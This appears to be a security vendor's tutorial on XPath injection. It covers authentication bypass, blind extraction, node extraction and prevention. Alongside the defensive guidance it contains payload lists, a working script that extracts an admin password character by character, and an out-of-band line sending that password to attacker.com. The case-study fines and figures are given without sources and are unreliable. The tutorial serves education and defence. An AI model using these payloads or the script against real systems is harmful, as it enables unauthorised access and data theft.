#
XPath Injection
A code injection attack where malicious XPath queries are injected into applications that use XML databases, allowing attackers to bypass authentication or extract sensitive data.
HIGH SEVERITY DATA BREACH XML SECURITY
#
What is XPath Injection?
Critical Data Exposure Risk
XPath Injection can expose entire XML databases, bypass authentication systems, and reveal sensitive information including passwords, financial data, and personal records.
In Simple Terms:
Imagine an XML database as a filing cabinet with folders organized in a specific structure. XPath is like the search command you use to find specific documents.
A normal search might be: "Find the folder for user 'John' with password 'secret123'"
XPath Injection is like manipulating the search to say: "Find the folder for user 'John' OR just show me ALL folders regardless of password"
The filing system follows your manipulated instructions and hands over everything - including documents you shouldn't see.
#
Real-World Analogy
Think of XPath like a library's book search system:
XML stores data in a tree structure, like a library organizing books by:
- Category → Genre → Author → Title
- Similar to:
/library/category/genre/author/book
Librarian searches:
//book[author='Smith' and title='The Secret']
Returns: One specific book by Smith
Attacker modifies search:
//book[author='Smith' or '1'='1' and title='anything']
- The
or '1'='1'part is always true - Returns: ALL books in the library!
The search system can't distinguish between a legitimate complex search and a manipulated one.
#
How XPath Injection Works
#
Understanding XPath and XML
XML (eXtensible Markup Language) stores data in a tree structure:
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user>
<username>admin</username>
<password>secretAdminPass123</password>
<role>administrator</role>
<email>admin@example.com</email>
</user>
<user>
<username>john</username>
<password>john'sPassword456</password>
<role>user</role>
<email>john@example.com</email>
</user>
</users>
XPath is a query language for selecting nodes from XML:
//user[username='admin' and password='secretAdminPass123']
#
The Attack Process
Application builds XPath query:
//user[username='admin' and password='correctPass']
Returns: Admin user if password matches
Attacker enters username: admin' or '1'='1
Application builds query:
//user[username='admin' or '1'='1' and password='anything']
'1'='1'is always true- The
oroperator makes entire condition true - Password check is bypassed
XPath returns the admin user without validating password, granting full access.
#
Types of XPath Injection Attacks
#
1. Authentication Bypass
CRITICAL
from lxml import etree
def authenticate_user(username, password):
# Load XML database
tree = etree.parse('users.xml')
# VULNERABLE: Direct string concatenation
xpath_query = f"//user[username='{username}' and password='{password}']"
# Execute query
result = tree.xpath(xpath_query)
if result:
return True # User authenticated
return False
# Attack payload
username = "admin' or '1'='1"
password = "anything"
# Resulting query: //user[username='admin' or '1'='1' and password='anything']
# Returns admin user without password verification!
Username Injections:
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
Password Injections:
' or '1'='1
anything' or 'x'='x
Combined:
Username: admin
Password: ' or '1'='1
Original query:
//user[username='admin' and password='correctPass']
Injected query:
//user[username='admin' or '1'='1' and password='anything']
Result: Returns admin user because '1'='1' is always true
#
2. Data Extraction (Blind XPath Injection)
HIGH RISK
When application doesn't display query results directly, attackers extract data character by character using boolean conditions.
# Testing if admin user exists
payload = "' or count(//user[username='admin'])=1 or ''='"
# Extracting admin password length
payload = "' or string-length(//user[username='admin']/password)=16 or ''='"
# Extracting first character of password
payload = "' or substring(//user[username='admin']/password,1,1)='a' or ''='"
payload = "' or substring(//user[username='admin']/password,1,1)='b' or ''='"
# ... continue for each character
# Extracting second character
payload = "' or substring(//user[username='admin']/password,2,1)='e' or ''='"
import requests
import string
def extract_admin_password(url):
"""Extract admin password character by character"""
password = ""
charset = string.ascii_letters + string.digits + string.punctuation
# First, find password length
for length in range(1, 50):
payload = f"' or string-length(//user[username='admin']/password)={length} or ''='"
response = requests.post(url, data={'username': payload, 'password': 'test'})
if "success" in response.text or response.status_code == 200:
print(f"[+] Password length: {length}")
break
# Extract each character
for position in range(1, length + 1):
for char in charset:
payload = f"' or substring(//user[username='admin']/password,{position},1)='{char}' or ''='"
response = requests.post(url, data={'username': payload, 'password': 'test'})
if "success" in response.text:
password += char
print(f"[+] Found character {position}: {char} (password so far: {password})")
break
return password
# Usage
admin_password = extract_admin_password('https://vulnerable-site.com/login')
print(f"[!] Admin password: {admin_password}")
#
3. Complete XML Document Extraction
MEDIUM RISK
# Vulnerable search function
def search_products(product_name):
tree = etree.parse('products.xml')
# VULNERABLE: No input sanitization
xpath_query = f"//product[name='{product_name}']"
results = tree.xpath(xpath_query)
return results
# Normal search
search_products("Laptop")
# Query: //product[name='Laptop']
# Returns: Laptop products
# Malicious search - Extract all products
search_products("' or '1'='1")
# Query: //product[name='' or '1'='1']
# Returns: ALL products in database!
# Extract specific sensitive data
search_products("'] | //user[username='admin")
# Query: //product[name=''] | //user[username='admin']
# Returns: Admin user data from users section!
Attack payloads using XPath functions:
Count nodes:
' or count(//user)>0 or ''='
Extract node names:
' or name(//user[1])='user' or ''='
Extract all text:
' or //text() or ''='
Access parent nodes:
' or //user/parent::* or ''='
Navigate XML structure:
' or //*/password or ''='
#
4. Out-of-Band Data Exfiltration
ADVANCED TECHNIQUE
# Some XPath implementations support external functions
# Attacker can exfiltrate data via HTTP requests
payload = """' or doc('http://attacker.com/steal?data=' || //user[username='admin']/password) or ''='"""
# This sends admin password to attacker's server
#
Real-World Examples
#
Case Study 1: Financial Institution Data Breach (2016)
Major bank's internal employee portal used XML database with XPath for authentication.
@app.route('/employee/login', methods=['POST'])
def employee_login():
username = request.form['username']
password = request.form['password']
# VULNERABLE: Direct string concatenation
xpath_query = f"//employee[username='{username}' and password='{password}']"
tree = etree.parse('/data/employees.xml')
result = tree.xpath(xpath_query)
if result:
session['user'] = result[0].find('username').text
session['role'] = result[0].find('role').text
return redirect('/dashboard')
return "Login failed"
External attacker discovered vulnerability through error messages:
Username: admin' or '1'='1
Password: [empty]
Then used blind XPath injection to extract:
- All employee credentials
- Salary information
- Social security numbers
- Bank account details
- Customer account numbers
- 15,000+ employee records compromised
- 2.5 million customer accounts at risk
- $45 million in direct costs (remediation, notification, credit monitoring)
- $120 million regulatory fines
- $85 million class action settlement
- Stock price dropped 22%
- CEO and CIO resigned
#
Case Study 2: Healthcare Portal XML Injection (2018)
250,000 Patients Affected
HIPAA Violation
XPath injection in patient portal exposed electronic health records stored in XML format.
Technical Details:
<!-- Their XML structure -->
<patients>
<patient>
<id>P12345</id>
<name>John Doe</name>
<ssn>123-45-6789</ssn>
<diagnosis>Diabetes Type 2</diagnosis>
<medications>
<medication>Metformin 500mg</medication>
<medication>Insulin Glargine</medication>
</medications>
<insurance>
<provider>BlueCross</provider>
<policy>BC-12345678</policy>
</insurance>
</patient>
</patients>
# Their vulnerable patient lookup
def get_patient_records(patient_id, dob):
# VULNERABLE: No input validation
xpath = f"//patient[id='{patient_id}' and dateOfBirth='{dob}']"
tree = etree.parse('/secure/patients.xml')
results = tree.xpath(xpath)
return render_template('patient_record.html', patient=results)
Attack Payload:
Patient ID: ' or '1'='1
Date of Birth: [any]
What Was Exposed:
- 250,000 patient health records
- Diagnoses and treatment histories
- Prescriptions and medications
- Social security numbers
- Insurance information
- Lab results and medical images
Consequences:
- $16 million HIPAA violation fine
- $42 million class action lawsuit
- Criminal investigation by DOJ
- Hospital system lost major contracts
- 3-year compliance monitoring imposed
#
Case Study 3: E-commerce Product Database Breach (2019)
Online retailer storing product catalog and customer reviews in XML
// Node.js vulnerable product search
const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');
app.get('/products/search', (req, res) => {
const searchTerm = req.query.q;
// VULNERABLE: Direct string interpolation
const xpathQuery = `//product[contains(name, '${searchTerm}') or contains(description, '${searchTerm}')]`;
const xml = fs.readFileSync('products.xml', 'utf8');
const doc = new dom().parseFromString(xml);
const results = xpath.select(xpathQuery, doc);
res.json(results);
});
Attacker used search functionality to inject:
Search: ') or '1'='1'] | //customer[contains(email, '@
This extracted:
- Internal product costs and margins
- Supplier pricing
- Customer email addresses
- Order histories
- Payment information
- 800,000 customer emails harvested
- Used for phishing campaign
- Competitive pricing information leaked
- $3.5 million in losses
- $8 million GDPR fines
#
How to Detect XPath Injection
#
Manual Testing
Find inputs that might query XML:
- Login forms
- Search boxes
- Filter parameters
- ID lookups
- API endpoints
Try XPath special characters:
' " / [ ] ( ) @ * |
Watch for:
- XML parsing errors
- XPath syntax errors
- Changes in response
- Different behavior
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
'] | //user[@* or '1'='1
' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='
#
Automated Testing Script
import requests
from urllib.parse import quote
def test_xpath_injection(target_url, param_name):
"""Test for XPath injection vulnerabilities"""
test_payloads = [
# Authentication bypass
"' or '1'='1",
"' or 1=1 or ''='",
"admin' or '1'='1' or ''='",
"' or ''='",
"x' or 1=1 or 'x'='y",
# Boolean tests
"' or count(//user)>0 or ''='",
"' or string-length(//user[1]/password)>0 or ''='",
# Node extraction
"'] | //user | //x[@'='",
"'] | //* | //x[@'='",
# Function tests
"' or name()='user' or ''='",
"' or local-name()='password' or ''='",
# Parent node access
"'] | //user/parent::* | //x[@'='"
]
vulnerabilities = []
baseline_response = None
try:
# Get baseline response
baseline_response = requests.get(target_url, params={param_name: 'normaltest'})
except Exception as e:
print(f"[-] Error getting baseline: {e}")
return []
print(f"[*] Testing {target_url} parameter '{param_name}'...")
for payload in test_payloads:
try:
response = requests.get(
target_url,
params={param_name: payload},
timeout=5
)
# Check for vulnerability indicators
if response.status_code != baseline_response.status_code:
vulnerabilities.append({
'payload': payload,
'type': 'Status Code Change',
'severity': 'MEDIUM',
'status': response.status_code
})
print(f"[!] Status change with: {payload}")
# Check for XPath errors
xpath_errors = [
'xpath',
'XPathException',
'xmlXPathEval',
'XPath error',
'XPath syntax error',
'Invalid predicate',
'Invalid expression'
]
for error in xpath_errors:
if error.lower() in response.text.lower():
vulnerabilities.append({
'payload': payload,
'type': 'XPath Error Message',
'severity': 'HIGH',
'error': error
})
print(f"[!] XPath error revealed with: {payload}")
break
# Check for successful bypass (content changes)
if len(response.text) > len(baseline_response.text) * 1.5:
vulnerabilities.append({
'payload': payload,
'type': 'Possible Authentication Bypass',
'severity': 'CRITICAL',
'note': 'Significantly more content returned'
})
print(f"[!] CRITICAL: Possible bypass with: {payload}")
except requests.exceptions.Timeout:
print(f"[-] Timeout with payload: {payload}")
except Exception as e:
print(f"[-] Error testing '{payload}': {e}")
return vulnerabilities
# Test your application
vulns = test_xpath_injection(
'https://example.com/search',
'q' # Query parameter name
)
if vulns:
print(f"\n[!] Found {len(vulns)} potential XPath injection vulnerabilities!")
for vuln in vulns:
print(f" [{vuln['severity']}] {vuln['type']}: {vuln['payload']}")
else:
print("[+] No XPath injection vulnerabilities detected")
# Burp Intruder payload list for XPath injection
payloads = """
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
x' or 1=1 or 'x'='y
'] | //user[@* or '1'='1'] | //x[@'='
'] | //* | //x[@'='
' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='
' or name()='user' or ''='
"""
# Configure Burp:
# 1. Set payload positions at vulnerable parameters
# 2. Load payloads from above list
# 3. Grep Match:
# - xpath
# - XPathException
# - xmlXPathEval
# - Invalid predicate
# 4. Check for status code changes
# 5. Compare response lengths
#
Prevention Strategies
#
1. Parameterized XPath Queries
MOST SECURE
from lxml import etree
def safe_authenticate(username, password):
"""Secure XPath authentication using parameterized queries"""
tree = etree.parse('users.xml')
# Method 1: Use XPath variables (lxml supports this)
# SECURE: Parameters are passed separately
xpath_query = "//user[username=$username and password=$password]"
result = tree.xpath(
xpath_query,
username=username,
password=password
)
if result:
return {
'authenticated': True,
'username': result[0].find('username').text,
'role': result[0].find('role').text
}
return {'authenticated': False}
# Attack payloads will NOT work
username = "admin' or '1'='1"
password = "anything"
# XPath treats these as literal strings, not code:
# username = "admin' or '1'='1" (the WHOLE string including quotes)
# password = "anything"
# No injection possible!
const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');
function safeAuthenticate(username, password) {
const xml = fs.readFileSync('users.xml', 'utf8');
const doc = new dom().parseFromString(xml);
// Method: Manually iterate and compare (most secure)
// SECURE: No XPath injection possible
const users = xpath.select('//user', doc);
for (let user of users) {
const userUsername = xpath.select('string(username)', user);
const userPassword = xpath.select('string(password)', user);
// Direct string comparison (no injection)
if (userUsername === username && userPassword === password) {
return {
authenticated: true,
username: userUsername,
role: xpath.select('string(role)', user)
};
}
}
return { authenticated: false };
}
// Attack payloads will not work
const result = safeAuthenticate("admin' or '1'='1", "anything");
// This looks for EXACT match of username "admin' or '1'='1"
// No code execution - just string comparison
import javax.xml.parsers.*;
import javax.xml.xpath.*;
import org.w3c.dom.*;
import java.io.File;
public class SecureXPathAuth {
public static boolean authenticateUser(String username, String password) {
try {
// Parse XML
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new File("users.xml"));
// SECURE: Use XPath with variables
XPathFactory xPathFactory = XPathFactory.newInstance();
XPath xPath = xPathFactory.newXPath();
// Set variables (parameterized)
SimpleVariableResolver resolver = new SimpleVariableResolver();
resolver.addVariable("username", username);
resolver.addVariable("password", password);
xPath.setXPathVariableResolver(resolver);
// Parameterized query
String xpathExpression = "//user[username=$username and password=$password]";
XPathExpression expr = xPath.compile(xpathExpression);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
return nodes.getLength() > 0;
} catch (Exception e) {
System.err.println("Authentication error: " + e.getMessage());
return false;
}
}
// Variable resolver for XPath parameters
static class SimpleVariableResolver implements XPathVariableResolver {
private Map<String, Object> variables = new HashMap<>();
public void addVariable(String name, Object value) {
variables.put(name, value);
}
@Override
public Object resolveVariable(QName variableName) {
return variables.get(variableName.getLocalPart());
}
}
}
#
2. Input Validation and Sanitization
DEFENSE IN DEPTH
import re
from html import escape
def sanitize_xpath_input(user_input):
"""Sanitize input for XPath queries"""
# Method 1: Strict allowlist validation
if not re.match(r'^[a-zA-Z0-9@._-]{3,50}$', user_input):
raise ValueError("Invalid input format")
return user_input
def escape_xpath_value(value):
"""Escape special XPath characters"""
# XPath doesn't have standard escaping, so we need to be creative
# If value contains both ' and ", we're in trouble with XPath 1.0
# Best approach: Use concat function
if "'" not in value:
# Simple case: wrap in single quotes
return f"'{value}'"
elif '"' not in value:
# No double quotes: wrap in double quotes
return f'"{value}"'
else:
# Contains both: use concat function
parts = value.split("'")
quoted_parts = [f'"{part}"' if part else "''" for part in parts]
return f"concat({', '.join(quoted_parts)})"
def safe_search_products(product_name):
"""Secure product search with escaping"""
# Validate input
if not product_name or len(product_name) > 100:
return []
tree = etree.parse('products.xml')
# Escape the value
escaped_name = escape_xpath_value(product_name)
# Build query with escaped value
xpath_query = f"//product[name={escaped_name}]"
results = tree.xpath(xpath_query)
return results
# Example usage
# Input: O'Reilly Books
# Escaped: concat("O", "'", "Reilly Books")
# Query: //product[name=concat("O", "'", "Reilly Books")]
import re
from typing import Any, Optional
class XPathInputValidator:
"""Comprehensive XPath input validation"""
# Validation patterns
USERNAME_PATTERN = r'^[a-zA-Z0-9._-]{3,20}$'
EMAIL_PATTERN = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
ALPHANUMERIC_PATTERN = r'^[a-zA-Z0-9\s]{1,100}$'
# Dangerous XPath keywords
XPATH_KEYWORDS = [
'or', 'and', 'not', 'div', 'mod', 'union', '|',
'parent::', 'ancestor::', 'following::', 'preceding::',
'document', 'doc', 'collection'
]
@staticmethod
def validate_username(username: str) -> bool:
"""Validate username format"""
return bool(re.match(XPathInputValidator.USERNAME_PATTERN, username))
@staticmethod
def validate_email(email: str) -> bool:
"""Validate email format"""
return bool(re.match(XPathInputValidator.EMAIL_PATTERN, email))
@staticmethod
def check_dangerous_keywords(value: str) -> bool:
"""Check for dangerous XPath keywords"""
value_lower = value.lower()
for keyword in XPathInputValidator.XPATH_KEYWORDS:
if keyword in value_lower:
return False
return True
@staticmethod
def sanitize_and_validate(value: str, input_type: str = 'alphanumeric') -> Optional[str]:
"""Sanitize and validate input"""
# Check length
if not value or len(value) > 100:
raise ValueError("Input length invalid")
# Remove dangerous characters
dangerous_chars = ["'", '"', '/', '[', ']', '(', ')', '@', '*', '|', '\\']
for char in dangerous_chars:
if char in value:
raise ValueError(f"Dangerous character detected: {char}")
# Check for XPath keywords
if not XPathInputValidator.check_dangerous_keywords(value):
raise ValueError("Dangerous XPath keyword detected")
# Type-specific validation
if input_type == 'username':
if not XPathInputValidator.validate_username(value):
raise ValueError("Invalid username format")
elif input_type == 'email':
if not XPathInputValidator.validate_email(value):
raise ValueError("Invalid email format")
elif input_type == 'alphanumeric':
if not re.match(XPathInputValidator.ALPHANUMERIC_PATTERN, value):
raise ValueError("Invalid alphanumeric input")
return value
# Usage
try:
username = XPathInputValidator.sanitize_and_validate("admin' or '1'='1", 'username')
# Raises: ValueError: Dangerous character detected: '
except ValueError as e:
print(f"Invalid input: {e}")
#
3. Migrate from XML to Secure Database
LONG-TERM SOLUTION
# Instead of XML/XPath, use proper database with parameterized queries
import sqlite3
from werkzeug.security import check_password_hash
def authenticate_with_database(username, password):
"""Secure authentication using SQLite with parameterized queries"""
conn = sqlite3.connect('users.db')
cursor = conn.cursor()
# SECURE: Parameterized query (no injection possible)
cursor.execute(
"SELECT username, password_hash, role FROM users WHERE username = ?",
(username,)
)
result = cursor.fetchone()
conn.close()
if result and check_password_hash(result[1], password):
return {
'authenticated': True,
'username': result[0],
'role': result[2]
}
return {'authenticated': False}
# Injection payloads have NO effect
username = "admin' or '1'='1"
# Treated as literal string "admin' or '1'='1"
# No code execution possible!
#
4. Comprehensive Security Implementation
from lxml import etree
from typing import Optional, Dict, Any
import logging
import hashlib
class SecureXPathService:
"""Enterprise-grade secure XPath service"""
def __init__(self, xml_file: str):
self.xml_file = xml_file
self.tree = None
self.logger = logging.getLogger(__name__)
self.load_xml()
def load_xml(self):
"""Load and validate XML file"""
try:
# Parse with security settings
parser = etree.XMLParser(
remove_blank_text=True,
resolve_entities=False, # Prevent XXE
no_network=True, # No external resources
dtd_validation=False, # No DTD validation
load_dtd=False # Don't load DTD
)
self.tree = etree.parse(self.xml_file, parser)
except Exception as e:
self.logger.error(f"Failed to load XML: {e}")
raise
def authenticate(self, username: str, password: str) -> Dict[str, Any]:
"""Secure authentication - iterate manually"""
# Input validation
if not self._validate_username(username):
self.logger.warning(f"Invalid username format: {username}")
return {'authenticated': False}
# Iterate through users manually (no XPath injection possible)
users = self.tree.xpath('//user')
for user in users:
stored_username = user.find('username').text
stored_password_hash = user.find('password_hash').text
if stored_username == username:
# Check password hash
password_hash = self._hash_password(password)
if password_hash == stored_password_hash:
self.logger.info(f"Successful authentication: {username}")
return {
'authenticated': True,
'username': stored_username,
'role': user.find('role').text
}
self.logger.warning(f"Failed authentication: {username}")
return {'authenticated': False}
def _validate_username(self, username: str) -> bool:
"""Strict username validation"""
import re
return bool(re.match(r'^[a-zA-Z0-9._-]{3,20}$', username))
def _hash_password(self, password: str) -> str:
"""Hash password"""
return hashlib.sha256(password.encode()).hexdigest()
def search_safe(self, field: str, value: str) -> list:
"""Safe search without user-controlled XPath"""
# Whitelist allowed fields
allowed_fields = ['username', 'email', 'role']
if field not in allowed_fields:
raise ValueError(f"Invalid field: {field}")
# Validate input
if not value or len(value) > 100:
raise ValueError("Invalid search value")
# Manual iteration (no XPath with user input)
results = []
users = self.tree.xpath('//user')
for user in users:
field_value = user.find(field)
if field_value is not None and value.lower() in field_value.text.lower():
results.append({
'username': user.find('username').text,
'email': user.find('email').text,
'role': user.find('role').text
})
return results
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user>
<username>admin</username>
<!-- Store password hashes, not plaintext -->
<password_hash>5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8</password_hash>
<role>administrator</role>
<email>admin@example.com</email>
</user>
<user>
<username>john</username>
<password_hash>6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</password_hash>
<role>user</role>
<email>john@example.com</email>
</user>
</users>
#
Security Checklist
#
Development
- Never concatenate user input into XPath queries
- Use parameterized XPath queries when available
- Validate all inputs with strict allowlists
- Remove or escape XPath special characters:
' " / [ ] ( ) @ * | - Check for dangerous XPath keywords (or, and, union, |)
- Store password hashes, never plaintext
- Consider migrating from XML to proper database
- Implement comprehensive input validation
#
Testing
- Test with XPath injection payloads
- Verify authentication bypass attempts fail
- Test boolean-based blind injection
- Check for XPath error messages in responses
- Test with special characters
- Verify node extraction attempts fail
- Test with XPath functions (count, substring, etc.)
- Use automated scanners (Burp Suite, OWASP ZAP)
#
Production
- Disable XML entity expansion (prevent XXE)
- Implement comprehensive logging
- Monitor for suspicious query patterns
- Set up alerts for authentication anomalies
- Regular security audits
- Keep XML libraries updated
- Implement rate limiting
- Use Web Application Firewall (WAF)
#
Key Takeaways
Critical Security Points
Never concatenate user input: Always use parameterized queries or manual iteration
Prefer alternative storage: Consider using proper databases instead of XML for sensitive data
Validate strictly: Use allowlist-based validation for all user inputs
Escape special characters: If concatenation is unavoidable, escape:
' " / [ ] ( ) @ * |Hash passwords: Never store plaintext passwords in XML
Limit error messages: Don't reveal XPath syntax or structure in errors
Manual iteration is safest: When in doubt, iterate through nodes manually and compare strings
Defense in depth: Combine multiple protection layers (validation + escaping + monitoring)
#
How Layerd AI Protects Against XPath Injection
Layerd AI provides comprehensive XPath injection protection:
- Automatic Input Sanitization: Detects and escapes XPath special characters in all inputs
- Query Pattern Analysis: Identifies malicious XPath syntax and boolean conditions
- Authentication Monitoring: Alerts on suspicious login attempts and bypass patterns
- XML Security Scanning: Analyzes XML data storage for security best practices
- Real-time Blocking: Prevents XPath injection attempts before they reach your XML database
- Code Analysis: Scans application code for vulnerable XPath query construction
Secure your XML data with Layerd AI's intelligent XPath injection protection.
#
Additional Resources
- OWASP XPath Injection Guide
- XPath Injection Testing (WSTG)
- W3C XPath Specification
- Blind XPath Injection Tutorial
Last Updated: November 2025